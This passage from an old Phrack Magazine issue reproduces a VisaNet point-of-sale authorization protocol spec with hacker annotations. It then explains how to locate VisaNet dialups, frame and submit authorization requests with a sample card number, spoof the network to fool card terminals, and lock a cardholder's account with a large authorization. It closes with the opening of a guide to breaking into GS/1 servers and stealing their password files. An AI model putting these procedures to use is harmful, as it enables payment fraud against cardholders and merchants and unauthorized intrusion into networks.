ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded Transaction Counter - Is represented by the concatenation of these two hexadecimal fields. The PIN pad serial number is stored as five hex digits minus one bit for a total of 19 bits of data. The transaction counter is stored as five hex digits plus one bit for a total of 21 bits of data. These two fields concatenated together will contain 40 bits. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 40 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand this 40 bit field, remove four bits at a time and convert them to ASCII characters using table 4.20. After this conversion, this 40 bit field will consist of 10 characters that will be placed in the Expanded TRSM ID & Expanded Transaction Counter Field. TABLE 4.20 PIN Block conversion Table HEXADECIMAL | ANSI X3.4 DATA | CHARACTER --------------+---------------- 0000 | 0 0001 | 1 0010 | 2 0011 | 3 0100 | 4 0101 | 5 0110 | 6 0111 | 7 1000 | 8 1001 | 9 1010 | A 1011 | B 1100 | C 1101 | D 1110 | E 1111 | F ------------------------------- 4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment] When Address Verification Service is requested, this field will contain the mailing address of the cardholder's monthly statement. The format of this field is: or Numbers are not spelled out. ("First Street" becomes "1ST Street", "Second" becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP code. For instance: 1391 ELM STREET 40404 is equivalent to: 1931ELMSTREET40404 P.O. Box 24356 55555 is not equivalent to P.O.BOX2435655555 If a field is not available or not applicable, it may be skipped. If nine digits are available, the last five digits should always be used to pour more sand into the wheels of progress. 4.21 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 16 of 28 **************************************************************************** VisaNet Operations (Continued) 4.22 TRANSACTION AMOUNT This is a variable field from three to twelve digits in length. The transaction amount includes the amount in 4.28, Secondary Amount. Therefore, field 4.22 must be greater than or equal to field 4.28. The transaction amount is presented by the terminal with an implied decimal point. For example $.01 would be represented in the record as "001". When the terminal is used with an authorization system which supports the US dollar as the primary currency, the amount field must be limited to seven digits (9999999). [...] The terminal may be used with authorization system which support other currencies that require the full twelve-digit field. 4.23 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.24 DEVICE CODE/INDUSTRY CODE This field is used to identify the device type which generated the transaction and the industry type of the merchant. Table 4.24 provides a brief summary of the current codes. TABLE 4.24 Device Code/Industry Code C C O O D D E DEVICE TYPE E INDUSTRY TYPE ------------------------------------------------------------------------------- 0 Unknown or Unsure 0 Unknown or Unsure 1 RESERVED 1 RESERVED 2 RESERVED 2 RESERVED 3 RESERVED 3 RESERVED 4 RESERVED 4 RESERVED 5 RESERVED 5 RESERVED 6 RESERVED 6 RESERVED 7 RESERVED 7 RESERVED 8 RESERVED 8 RESERVED 9 RESERVED 9 RESERVED A RESERVED A RESERVED B RESERVED B Bank/Financial Institution C P.C. C RESERVED D Dial Terminal D RESERVED E Electronic Cash Register (ECR) E RESERVED F RESERVED F Food/Restaurant G RESERVED G Grocery Store/Supermarket H RESERVED H Hotel I In-Store Processor I RESERVED J RESERVED J RESERVED K RESERVED K RESERVED L RESERVED L RESERVED M Main Frame M Mail Order N RESERVED N RESERVED O RESERVED O RESERVED P POS-port P RESERVED Q RESERVED for POS-port Q RESERVED R RESERVED R Retail S RESERVED S RESERVED T RESERVED T RESERVED U RESERVED U RESERVED V RESERVED V RESERVED W RESERVED W RESERVED X RESERVED X RESERVED Y RESERVED Y RESERVED Z RESERVED Z RESERVED -------------------------------------------------------------------------------- 4.25 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID This six-digit field is provided by the merchant signing member and is present when the terminal is used to process transactions which can not be routed using the cardholder Primary Account Number. When a value is present in this field, it is used as an RIID for all valid transaction codes, field 4.12, except 81 through 88. This field is used as an IIID for transaction codes 81 through 88. Table 4.26 provides a summary of the RIID codes for check acceptance. TABLE 4.26 Check Acceptance RIID Values Vendor RIID --------------------------- JBS, Inc 810000 Telecheck 861400 TeleCredit, West 894300 [note; telecredit has been TeleCredit, East 894400 mutated/eaten by equifax] --------------------------- 4.27 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.28 SECONDARY AMOUNT (CASHBACK) NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field, see section 4.18, has been manually entered. This is a variable length field from three to twelve digits in length. The Secondary Amount is included in field 4.22, Transaction Amount. The secondary amount is presented by the terminal with an implied decimal point. For example $.01 would be represented in the record as "001". This field will contain 000 when no secondary amount has been requested. Therefore, when the terminal is used with an authorization system which supports the US dollar as the primary currency, the secondary amount field must be limited to seven digits (9999999). The terminal may be used with authorization systems which support other currencies that require the full twelve-digit field. 4.29 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.30 MERCHANT NAME This 25-character field contains the merchant name provided by the signing member. the name must correspond to the name printed on the customer receipt. The name is left justified with space fill. The first character position can not be a space. This field must contain the same used in the data capture batch. 4.32 MERCHANT STATE This two-character field contains the merchant location state abbreviation provided by the singing member. The abbreviation must correspond to the state name printed on the customer receipt and be one of the Visa accepted abbreviations. This field must contain the same data used in the data capture batch. 4.33 SHARING GROUP This one to fourteen-character field contains the group of debit card/network types that a terminal may have access to and is provided by the singing member. The values must correspond to one of the Visa assigned debit card /network types. This data is part of the VisaNet debit data. 4.34 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.35 MERCHANT ABA NUMBER This fixed length field is twelve digits in length. If this field is not used, its length must be zero. If this field is not used, the following field must also be empty. This number identifies the merchant to a debit switch provided by the signing member. The number is provided by the signing member. 4.36 MERCHANT SETTLEMENT AGENT NUMBER This fixed length field is four digits in length. If this field is not used, its length must be zero. If this field is not used, the previous field must also be empty. This number identifies the merchant settling agent. The number is provided by the signing member. 4.37 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.38 AGENT NUMBER This six-digit field contains an agent number assigned by the signing member. The number identifies an institution which signs merchants as an agent of a member. The member uses this number to identify the agent within the member systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers are required to uniquely identify a terminal within the VisaNet systems. 4.39 CHAIN NUMBER This six-digit field contains a merchant chain identification number assigned by the singing member. The member uses this number to identify the merchant chain within the member systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers are required to uniquely identify a terminal within the VisaNet systems. 4.40 BATCH NUMBER This three-digit field contains a batch sequence number generated by the terminal. The number will wrap from 999 to 001. This number is that data capture batch number. 4.41 REIMBURSEMENT ATTRIBUTE This is a single character fixed length field. This field contains the reimbursement attribute assigned by the singing member. This field must be a "space". 4.42 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.43 APPROVAL CODE This contains a six-character fixed length field. This field is only present in cancel transactions and contains the original approval code from the original transaction. The approval code was returned in the authorization response of the transaction to be canceled. 4.44 SETTLEMENT DATE This contains a four-digit fixed length field. This field is only present in cancel transactions and contains the settlement date from the original transaction and is in the format MMDD. The settlement date was returned in the authorization response of the transaction to be canceled. 4.45 LOCAL TRANSACTION DATE This contains a four-digit fixed length field. This field is only present in cancel transactions and contains the transaction date from the original transaction and is in the format MMDD. The transaction date was returned in the authorization response of the transaction to be canceled as MMDDYY. 4.46 LOCAL TRANSACTION TIME This contains a six-digit fixed length field. This field is only present in cancel transactions and contains the transaction time from the original transaction and is in the format HHMMSS. The transaction time was returned in the authorization response of the transaction to be canceled. 4.47 SYSTEM TRACE AUDIT NUMBER This contains a six-character fixed length field. This field is only present in cancel transactions and contains the trace audit number from the original transaction. The trace audit number was returned in the authorization response of the transaction to be canceled. 4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE The field is a two-character fixed length field and must contain the original AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled. Currently, the only transaction that can be canceled in an Interlink Debit Purchase. 4.49 NETWORK IDENTIFICATION CODE This contains a single character fixed length field. This field is only present in cancel transactions and contains the network ID from the original transaction. The network ID was returned in the authorization response of the transaction to be canceled. 4.50 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS The following subsections will define the authorization response record data elements. 5.01 PAYMENT SERVICE INDICATOR This field contains the one-character payment service indicator. It must be placed in the batch detail record for terminals that capture. Table 5.01 provides a summary of current Values. TABLE 5.01 Payment Service Indicator Values VALUE DESCRIPTION ------------------------------------------------------------------ A REPS qualified Y Requested a "Y" in field 4.14 and there was a problem REPS denied (VAS edit error or BASE I reject) N Requested an "N" in field 4.14 or requested a "Y" in field 4.14 and request was downgraded (by VAS) space If "Y" sent and transaction not qualified (VAS downgrade) ------------------------------------------------------------------- 5.02 STORE NUMBER This four-digit number is returned by VisaNet from the authorization request for formats "J" and "G", and can be used to route the response within a store controller and/or a store concentrator. 5.03 TERMINAL NUMBER This four-digit number is returned by VisaNet from the authorization request for formats "J" and "G", and can be used to route the response within a store controller and/or a store concentrator. 5.04 AUTHORIZATION SOURCE CODE This field contains a one-character code that indicates the source of the authorization. The received code must be placed in the data capture detail transaction record when data capture is enabled. Table 5.04 provides a summary of current codes. TABLE 5.04 Authorization Source Codes Code Description -------------------------------------------------------------------------------- 1 STIP: time-out response 2 LCS: amount below issuer limit 3 STIP: issuer in Suppress-Inquiry mode 4 STIP: issuer unavailable 5 Issuer approval 6 Off-line approval, POS device generated 7 Acquirer approval: BASE I unavailable 8 Acquirer approval of a referral 9 Use for non-authorized transactions; such as credit card credits [yum!] D Referral: authorization code manually keyed E Off-line approval: authorization code manually keyed -------------------------------------------------------------------------------- 5.05 TRANSACTION SEQUENCE NUMBER This field contains the four-digit code which was generated by the terminal as the sequence number for the transaction and passed to the authorization center in the authorization request record. The sequence number can be used by the terminal to match request and response messages. The transaction sequence number is returned by VisaNet without sequence verification. 5.06 RESPONSE CODE This field contains a two-character response code indicating the status of the authorization. Table 5.06 provides the response codes for formats "J" and "G". A response code of "00" represents an approval. A response code of "85" represents a successful card verification returned by TRANSACTION CODES 58, 68, and 88. All other response codes represent a non-approved request. The value returned is stored in the batch transaction detail record for terminals that capture. TABLE 5.06 Authorization Response Codes For Record Formats "J" & "G" Authorization Response AVS Result Response Message Code Response Definition Code -------------------------------------------------------------------------------- EXACT MATCH 00 Exact Match, 9 digit zip X EXACT MATCH 00 Exact Match, 5 digit zip GRIND Y ADDRESS MATCH 00 Address match only A ZIP MATCH 00 9-digit zip match only W ZIP MATCH 00 5-digit zip match only GRIND Z NO MATCH 00 No address or zip match N VER UNAVAILABLE 00 Address unavailable U RETRY 00 Issuer system unavailable R ERROR INELIGIBLE 00 Not a mail/phone order E SERV UNAVAILABLE 00 Service not supported S APPROVAL 00 Approved and completed see above CARD OK 85 No reason to decline see above CALL 01 Refer to issuer 0 CALL 02 Refer to issue - Special condition 0 NO REPLY 28 File is temporarily unavailable 0 NO REPLY 91 Issuer or switch is unavailable 0 HOLD-CALL 04 Pick up card 0 HOLD-CALL 07 Pick up card - Special condition 0 HOLD-CALL 41 Pick up card - Lost 0 HOLD-CALL 43 Pick up card - Stolen 0 ACCT LENGTH ERR EA Verification Error 0 ALREADY REVERSED 79 Already Reversed at Switch [ya got me] 0 AMOUNT ERROR 13 Invalid amount 0 CAN'T VERIFY PIN 83 Can not verify PIN 0 CARD NO ERROR 14 Invalid card number 0 CASHBACK NOT APP 82 Cashback amount not approved 0 CHECK DIGIT ERR EB Verification Error 0 CID FORMAT ERROR EC Verification Error 0 DATE ERROR 80 Invalid Date 0 DECLINE 05 Do not honor 0 DECLINE 51 Not Sufficient Funds 0 DECLINE 61 Exceeds Withdrawal Limit 0 DECLINE 65 Activity Limit Exceeded 0 ENCRYPTION ERROR 81 Cryptographic Error 0 ERROR xx 06 General Error 0 ERROR xxxx 06 General Error 0 EXPIRED CARD 54 Expired Card 0 INVALID ROUTING 98 Destination Not Found 0 INVALID TRANS 12 Invalid Transaction 0 NO CHECK ACCOUNT 52 No Check Account 0 NO SAVE ACCOUNT 54 No Save Account 0 NO SUCH ISSUER 15 No Such Issuer 0 RE ENTER 19 Re-enter Transaction 0 SEC VIOLATION 63 Security Violation 0 SERV NOT ALLOWED 57 Trans. not permitted-Card 0 SERV NOT ALLOWED 58 Trans. not permitted-Terminal 0 SERVICE CODE ERR 62 Restricted Card 0 SYSTEM ERROR 96 System Malfunction [whoop whoop!] 0 TERM ID ERROR 03 Invalid Merchant ID 0 WRONG PIN 55 Incorrect PIN 0 xxxxxxxxxxxxxxxxxx xx Undefined Response 0 -------------------------------------------------------------------------------- 5.07 APPROVAL CODE This field contains a six-character code when a transaction has been approved. If the transaction is not approved the contents of the field should be ignored. The approval code is input to the data capture detail transaction record. 5.08 LOCAL TRANSACTION DATE This field contains a six-digit local date calculated (MMDDYY) by the authorization center using the time zone differential code provided in the authorization request message. This date is used by the terminal as the date to be printed on the transaction receipts and audit reports, and as the date input to the data capture transaction detail record. This field is only valid for approved transactions. 5.09 AUTHORIZATION RESPONSE MESSAGE This field is a sixteen-character field containing a response display message. This message is used by the terminal to display the authorization results. Table 5.06 provides the message summary. The messages are provided with "sp" space fill. This field is mapped to the RESPONSE CODE, field 5.06, for all non-AVS transactions and for all DECLINED AVS transactions. For APPROVED AVS transactions (response code = "00" or "85"), it is mapped to the AVS RESULT CODE, field 5.10. 5.10 AVS RESULT CODE This one-character field contains the address verification result code. An address verification result code is provided for transactions and provides an additional indication that the card is being used by the person to which the card was issued. The service is only available for mail/phone order transactions. Table 5.06 provides a summary of the AVS Result Codes. An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined transactions. 5.11 TRANSACTION IDENTIFIER This numeric field will contain a transaction identifier. The identifier will be fifteen-digits in length if the payment service indicator value is an "A" or it will be zero in length if the payment service indicator value is not an "A". This value is stored in the batch detail record for terminals that capture and is mandatory for REPS qualification. 5.12 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 5.13 VALIDATION CODE This alphanumeric field will contain a validation code. The code will contain a four-character value if the payment service indicator value is an "A" or it will be zero in length if the payment service indicator value is not an "A". This value is stored in the batch detail record for terminals that capture and is mandatory for REPS qualification. 5.14 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 5.15 NETWORK IDENTIFICATION CODE This one-character fixed length field contains the identification code of the network on which the transaction was authorized. The network ID must be printed on the receipt. 5.16 SETTLEMENT DATE This four-digit fixed length field contains the transaction settlement date returned by the authorizing system (MMDD). The settlement date must be printed on the receipt. 5.17 SYSTEM TRACE AUDIT NUMBER This six-character fixed length field contains a trace audit number which is assigned by the authorizing system. The trace audit number must be printed on the receipt. 5.18 RETRIEVAL REFERENCE NUMBER This twelve-character fixed length field contains the transaction retrieval reference number returned by the authorizing system. The reference number should be printed on the receipt. 5.19 LOCAL TRANSACTION TIME This six-digit fixed length field contains the transaction time returned by the authorizing system (HHMMSS). The time must be printed on the receipt. 6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS The following subsections define the debit confirmation response record data elements. 6.01 NETWORK IDENTIFICATION CODE This one character fixed length field contains the identification code of the network on which the transaction was authorized. The network ID is printed on the receipt. 6.02 SETTLEMENT DATE This four-digit fixed length field contains the transaction settlement date returned by the authorizing system. 6.03 SYSTEM TRACE AUDIT NUMBER This six-character fixed length field contains the system trace audit number which is assigned by the authorizing system. 7.0 CHARACTER CODE DEFINITIONS The following subsections will define the authorization request record character set and character sets used for track 1 and track 2 data encoded on the magnetic stripes. The authorization request records are generated with characters defined by ANSI X3.4-1986. The data stored on the cardholder's card in magnetic or optical form must be converted to the ANSI X3.4 character set before transmission to VisaNet. Section 7.01 provides track 1 character set definition. Section 7.02 provides track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986 and ISO 646 character set definitions. Section 7.04 provides a cross reference between the track 1, track 2, and ANSI X3.4 character sets. Section 7.05 describes the method for generating and checking the Mod 10 Luhn check digit for credit card account numbers. Section 7.06 describes the method for generating the LRC byte for the authorization request message and for testing the card swipe's LRC byte. Section 7.07 provides sample data for an authorization request and response for record format "J" testing. The POS device/authorization must perform the following operations on track read data before it can be used in an authorization request message. 1. The LRC must be calculated for the data read from the track and compared to the LRC read from the track. The track data is assumed to be read without errors when on character parity errors are detected and the calculated and read LRC's match. 2. The starting sentinel, ending sentinel, and LRC are discarded. 3. The character codes read from the magnetic stripe must be converted from the encoded character set to the set used for the authorization request message. The characters encoded on track 1 are six-bit plus parity codes and the characters encoded on track 2 are four-bit plus parity codes, with the character set used for the request message defined as seven-bit plus parity codes. All characters read from a track must be converted to the request message character set and transmitted as part of the request. The converted track data can not be modified by adding or deleting non-framing characters and must be a one-for-one representation of the characters read from the track. [sounds like they mean it, eh?] 7.1 TRACK 1 CHARACTER DEFINITION Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions. This "standards" format is a SAMPLE guideline for expected credit card track encoding; ATM/debit cards may differ. Actual cards may differ [not], whether they are Visa cards or any other issuer's cards. Each character is defined by the six-bit codes listed in Table 7.01. Track 1 can be encoded with up to 79 characters as shown in Figure 7.01 +---------------------------------------------------------+ |SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC| +---------------------------------------------------------+ LEGEND: Field Description Length Format -------------------------------------------------------------------------------- SS Start Sentinel 1 % FC Format Code ("B" for credit cards) 1 A/N PAN Primary Account Number 19 max NUM FS Field Separator 1 ^ NAME Card Holder Name (See NOTE below) 26 max A/N FS Field Separator 1 ^ DATE Expiration Date (YYMM) 4 NUM Discretionary Data Option Issuer Data (See NOTE below) variable A/N ES End Sentinel 1 ? LRC Longitudinal Redundancy Check 1 --- Total CAN NOT exceed 79 bytes-----> 79 -------------------------------------------------------------------------------- FIGURE 7.01 Track 1 Encoding Definition NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator and a "." as the title separator The DISCRETIONARY DATA can contain any of the printable characters from Table 7.01 TABLE 7.01 Track 1 Character Definition b6 0 0 1 1 BIT NUMBER b5 0 1 0 1 (a) These character positions ------------------------------------------- are for hardware use only b4 b3 b2 b1 ROW/COL 0 1 2 3 ------------------------------------------- (b) These characters are for 0 0 0 0 0 SP 0 (a) P country use only, not for 0 0 0 1 1 (a) 1 A Q international use 0 0 1 0 2 (a) 2 B R 0 0 1 1 3 (c) 3 C S (c) These characters are 0 1 0 0 4 $ 4 D T reserved for added 0 1 0 1 5 (%) 5 E U graphic use [nifty] 0 1 1 0 6 (a) 6 F V 0 1 1 1 7 (a) 7 G W 1 0 0 0 8 ( 8 H X (%) Start sentinel 1 0 0 1 9 ) 9 I Y (/) End sentinel 1 0 1 0 A (a) (a) J Z (^) Field Separator 1 0 1 1 B (a) (a) K (b) / Surname separator 1 1 0 0 C (a) (a) L (b) . Title separator 1 1 0 1 D - (a) M (b) SP Space 1 1 1 0 E - (a) N (^) +-----------------------+ 1 1 1 1 F / (?) O (a) |PAR|MSB|B5|B4|B3|B2|LSB| +-+---+-----------------+ | |--- Most Significant Bit |--- Parity Bit (ODD) Read LSB First 7.02 TRACK 2 CHARACTER DEFINITION Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. This "standards" format is a SAMPLE guideline for expected credit card track encoding; ATM/debit cards may differ. Actual cards may differ, whether they are Visa cards or any other issuer's cards. Each character is defined by the four-bit codes listed in Table 7.02. Track 2 can be encoded with up to 40 characters as shown in Figure 7.02. +--------------------------------------------------------+ |SS| PAN |FS| DATE| DISCRETIONARY DATA |ES|LRC| +--------------------------------------------------------+ LEGEND: Field Description Length Format -------------------------------------------------------------------------------- SS Start Sentinel 1 0B hex PAN Primary Account Number 19 max NUM FS Field Separator 1 = Discretionary Data Option Issuer Data (See NOTE below) variable A/N ES End Sentinel 1 0F hex LRC Longitudinal Redundancy Check 1 --- Total CAN NOT exceed 40 bytes-----> 40 -------------------------------------------------------------------------------- FIGURE 7.02 Track 2 Encoding Definition NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be numeric with optional field separators as specified in Table 7.02. TABLE 7.02 Track 2 Character Set b4 b3 b2 b1 COL (a) These characters are for ------------------------------ hardware use only 0 0 0 0 0 0 0 0 0 1 1 1 (B) Starting Sentinel 0 0 1 0 2 2 0 0 1 1 3 3 (D) Field Separator 0 1 0 0 4 4 0 1 0 1 5 5 (F) Ending Sentinel 0 1 1 0 6 6 0 1 1 1 7 7 1 0 0 0 8 8 +---------------------------+ 1 0 0 1 9 9 | PAR | MSB | b3 | b2 | LSB | 1 0 1 0 A (a) +---------------------------+ 1 0 1 1 B (B) | | 1 1 0 0 C (a) | |--- Most Significant Bit 1 1 0 1 D (D) |--- Parity Bit (ODD) 1 1 1 0 E (a) 1 1 1 1 F (F) Read LSB first [ tables 7.03a, 7.03b, and 7.04 deleted... If you really need a fucking ascii table that bad go buy a book.] [ section 7.05 - Account Data Luhn Check deleted... as being unnecessary obtuse and roundabout in explaining how the check works. the routine written by crazed luddite and murdering thug is much clearer. ] 7.06 CALCULATING AN LRC When creating or testing the LRC for the read of the card swipe, the authorization request record, the debit confirmation record or the VisaNet response record; use the following steps to calculate the LRC: 1) The value of each bit in the LRC character, excluding the parity bit, is defined such that the total count of ONE bits encoded in the corresponding bit location of all characters of the data shall be even (this is also known as an EXCLUSIVE OR (XOR) operation) For card swipes, include the start sentinel, all the data read and the end sentinel. For VisaNet protocol messages, begin with the first character past the STX, up to and including the ETX. 2) The LRC characters parity bit is not a parity bit for the individual parity bits of the data message, but it only the parity bit for the LRC character itself. Calculated as an even parity bit. [ i list a routine for calculating an LRC o a string later on in the document ] 7.07 TEST DATA FOR RECORD FORMAT "J" The following two sections provide sample data for testing record format "J" with the VisaNet dial system. 7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST Table 7.07a provides a set of test data for record format "J" authorization request. TABLE 7.07a Test Data For Record Format "J" Test Data Byte # Length Format Field Name -------------------------------------------------------------------------------- J 1 1 A/N Record Format 0, 2, or 4 2 1 A/N Application Type . 3 1 A/N Message Delimiter 401205 4-9 6 A/N Acquirer BIN 123456789012 10-21 12 NUM Merchant Number 0001 * 22-25 4 NUM Store Number 0001 * 26-29 4 NUM Terminal Number 5999 30-33 4 NUM Merchant Category Code 840 34-36 3 NUM Merchant Country Code 94546 37-41 5 A/N Merchant City Code 108 42-44 3 NUM Time Zone Differential 54 45-46 2 A/N Authorization Transaction Code 12345678 47-54 8 NUM Terminal Identification Number Y 55 1 A/N Payment Service Indicator 0001 * 56-59 4 NUM Transaction Sequence Number @ 60 1 A/N Cardholder Identification Code D, H, T, or X 61 1 A/N Account Data Source Track or Customer Data Field Manual Data "FS" N.A. 1 "FS" Field Separator 0000123 N.A. 0 to 43 A/N Transaction Amount "FS" N.A. 1 "FS" Field Separator ER N.A. 0 or 2 A/N Device Code/Industry code "FS" N.A. 1 "FS" Field Separator N.A. 0 or 6 NUM Issuing/Receiving Institution ID "FS" N.A. 1 "FS" Field Separator 000 N.A. 3 to 12 NUM Secondary Amount (Cashback) "FS" N.A. 1 "FS" Field Separator -------------------------------------------------------------------------------- NOTE:* Denotes fields that are returned in the response message 7.07.2 RESPONSE MESSAGE FOR TEST DATA Table 7.07b provides the response message for the test data provided in section 7.07.1. TABLE 7.07b Response Message For Test Data - Record Format "J" Test Data Byte # Length Format Field Name -------------------------------------------------------------------------------- A, Y, N, or * 1 1 A/N Payment Service Indicator "space" 0001 * 2-5 4 NUM Store Number 0001 * 6-9 4 NUM Terminal Number 5 * 1 1 A/N Authorization Source Code 0001 * 11-14 4 NUM Transaction Sequence Number 00 * 15-16 2 A/N Response Code 12AB45 * 17-22 6 A/N Approval Code 111992 * 23-28 6 NUM Transaction Date (MMDDYY) AP ______ 29-44 16 A/N Authorization Response Message 0, Sp, or "FS" 45 1 A/N AVS Result Code *Variable 0 or 15 NUM Transaction Identifier "FS" "FS" Field Separator *Variable 0 or 4 A/N Validation Code "FS" "FS" Field Separator -------------------------------------------------------------------------------- NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC) -------------------------------------------------------------------------------- [ section two ] [ finding visanet ] finding visanet isn't hard, but it can be tedious. visanet rents time off of compuserve and X.25 networks. the compuserve nodes used are not the same as their information service, cis. to identify a visanet dialup after connecting, watch for three enq characters and a three second span to hangup. if you've scanned out a moderate portion of your area code, you probably have a few dialups. one idea is to write a short program to dial all the connects you have marked as garbage or worthless [ you did keep em, right? ] and wait for the proper sequence. X.25 connections should work similarly, but i don't know for sure. read the section on visanet usage for other dialup sources. [ section three ] [ visanet link level protocol ] messages to/from visanet have a standard format: stx - message - etx - lrc the message portion is the record formats covered in section one. lrc values are calculated starting with the first byte of message, going up to and including the etx character. heres an algorithm that calculates the lrc for a string. note: in order to work with the visanet protocols, append etx to the string before calling this function. unsigned char func_makelrc(char *buff) { int i; char ch, *p; ch = 0; p = buff; for(;;) { ch = (ch^(*p)); p++; if(!(*p)) break; } return ch; } for a single authorization exchange, the easiest kind of transaction, the sequence goes like this: host enq stx-response-etx-lrc eot term stx-request-etx-lrc ack matching this sequence with test record formats from section one, 7.07, heres an ascii representation of a transaction. control characters denoted in <>'s. [of course, you wouldn't really have a carriage return in middle of a message. duh. ] this transaction would be for card number 4444111122223333 with an expiration date of 04/96. the purchase amount is $1.23. visanet responds with an approval code of 12ab45. host: term: J0.401205123456789012000100015999840945461085412345678Y0001@H444411 112222333304960000123ER000 host: Y00010001500010012AB45111992APPROVAL 12AB45123456789012345 ABCD term: host: authorizing multiple transactions during one connect session is only slightly more complicated. the etx character on all messages sent to visanet are changed to etb and the application type is changed from '0' to '2' [section one 4.02]. instead of responding after a transaction with eot, visanet instead polls the terminal again with enq. this continues until the terminal either changes back to the single transaction format or issues an eot to the host. heres a short list of all control characters used: stx: start-of-text, first message framing character signaling message start etx: end-of-text, the frame ending character the last message of a sequence eot: end-of-transmission, used to end an exchange and signal disconnect enq: enquiry, an invitation to transmit a message or retransmit last item ack: affirmative acknowledgment, follows correct reception of message nak: negative acknowledgment, used to indicate that the message was not understood or was received with errors syn: delay character, wait thirty seconds etb: end-of-block, the end framing character used to signal the end of a message within a multiple message sequence other quick notes: visanet sometimes sends ack before stx on responses lrc characters can hold any value, such as stx, nak, etc visanet can say goodbye at any time by sending eot people can get very anal about error flow diagrams [ section four ] [ half the story; central data capture ] a full transaction requires two steps, one of which is described in this document: getting the initial authorization. an authorization does basically nothing to a person's account. oh, you could shut somebody's account down for a day or two by requesting a twenty thousand dollar authorization, but no other ill effects would result. central data capture, the second and final step in a transaction, needs information from both the authorization request and response, which is used to generate additional data records. these records are then sent to visanet by the merchant in a group, usually at the end of each day. [ section five ] [ common applications ] access to visanet can be implemented in a number of ways: directly on a pos terminal, indirectly via a lan, in a hardware specific device, or any permutation possible to perform the necessary procedures. card swipers commonly seen at malls are low tech, leased at around fifty dollars per month, per terminal. they have limited capacity, but are useful in that all of the information necessary for transactions is self contained. dr delam and maldoror found this out, and were delighted to play the role of visanet in fooling the little device. close scrutiny of section one reveals atm formats, phone order procedures, and new services such as direct debit from checking/savings and checks by phone. start noticing the stickers for telecheck and visa atm cards, and you're starting to get the picture. [ section seven ] [ brave new world ] could it be? yes, expiration dates really don't matter.... this article written to thank previous Phrack writers... please thank me appropriately... 800#s exist... other services exist... mastercard runs one... never underestimate the power of asking nicely... numerous other formats are available... see section one, 3.0 for hints... never whistle while you're pissing... ==Phrack Magazine== Volume Five, Issue Forty-Six, File 17 of 28 **************************************************************************** [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] [<> <>] [<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>] [<> <>] [<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>] [<> <>] [<> Brought to you by: <>] [<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>] [<> <>] [<> Story line: Maldoror -n- [)r. [)elam <>] [<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>] [<> Unix Technical Expertise: Wunder-Boy [)elam <>] [<> Sysco Technishun: Marvelous Maldoror <>] [<> <>] [<> Look for other fine [)elamo Labz and ChURcH oF ThE <>] [<> Non-CoNForMisT products already on the market such as <>] [<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>] [<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>] [<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>] [<> identification program), and various other programs and <>] [<> philez written by Dr. Delam, Maldoror, Green Paradox, <>] [<> El Penga, Hellpop, and other certified DLI and CNC members. <>] [<> <>] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] Index ======================================== 1. Finding and identifying a GS/1 2. Getting help 3. Gaining top privilege access 4. Finding the boot server 5. Connecting to the boot server 6. Getting the boot server password file 7. Other avenues ---------------------------------------------------------------------------- Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is advisable to fill your stein with Sysco and pay close attention... if Sysco is not available in your area, Hacker Pschorr beer will work almost as good... (especially Oktoberfest variety) What is a GS/1? --------------- A GS/1 allows a user to connect to various other computers... in other words, it's a server, like a DEC or Xyplex. So why hack it? --------------- Cuz itz there... and plus you kan access all sortz of net stuph fer phree. (QSD @ 208057040540 is lame and if you connect to it, you're wasting the GS/1.. the French fone police will fly over to your country and hunt you down like a wild pack of dogs, then hang you by your own twisted pair.) What to do: ----------- +--------------------------------------+ + #1. Finding and identifying a GS/1 + +--------------------------------------+ Find a GS/1 .. they're EZ to identify.. they usually have a prompt of GS/1, though the prompt can be set to whatever you want it to be. A few years ago there were quite a number of GS/1's laying around on Tymnet and Telenet... you can still find a few if you scan the right DNIC's. (If you don't know what the hell I'm talking about, look at some old Phracks and LOD tech. journals.) 